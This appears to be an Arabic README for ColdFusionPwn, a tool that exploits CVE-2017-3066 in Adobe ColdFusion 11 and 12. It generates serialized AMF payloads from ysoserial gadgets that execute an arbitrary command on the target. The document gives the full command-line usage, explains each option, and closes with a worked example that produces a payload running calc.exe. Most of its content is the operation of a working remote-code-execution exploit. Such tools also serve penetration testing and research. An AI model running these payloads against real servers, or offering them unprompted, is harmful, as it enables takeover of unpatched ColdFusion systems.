
أداة استغلال لـ CVE-2017-3066 تستهدف Adobe Coldfusion 11/12
أداة استغلال لـ CVE-2017-3066 تستهدف Adobe Coldfusion 11/12.
تتيح لك الأداة إنشاء حمولات AMF مسلسلة لاستغلال التحقق المفقود من صحة الإدخال للفئات المسموح بها. للتفاصيل، راجع منشور المدونة الخاص بنا.
احصل على أحدث إصدار من ysoserial. احصل على ColdFusionPwn من الإصدارات.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
يجب أن يكون ColdFusionPwn-0.0.1-SNAPSHOT-all.jar هو الإدخال الأول في مسار الفئات (classpath)، لأن مكتبة ApacheCommons BeanUtils المرفقة مع ysoserial أحدث (ولدها معرّف تسلسل مختلف).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf